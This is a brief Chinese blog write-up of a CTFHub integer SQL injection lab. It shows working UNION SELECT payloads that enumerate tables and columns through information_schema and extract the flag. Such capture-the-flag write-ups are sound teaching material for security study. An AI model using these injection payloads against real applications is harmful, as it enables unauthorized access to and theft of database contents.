CTFHub-web(SQL整数型注入)

上题
在这里插入图片描述
按照提示输入1
在这里插入图片描述
尝试知道有几个字段,先传入1 order by 2,回显正常
在这里插入图片描述
然后1 order by 3,根据回显可得知只有两个字段
在这里插入图片描述
找注入点
在这里插入图片描述
得知1,2均为注入点
在这里插入图片描述
知道了当前数据库名,便可查询出表名

0 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

在这里插入图片描述
flag必然在名为flag的表里面,查询字段

0 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

在这里插入图片描述
查询flag字段拿到flag

0 union select 1,flag from sqli.flag

在这里插入图片描述

发布了31 篇原创文章 · 获赞 3 · 访问量 1002
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 书香水墨 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览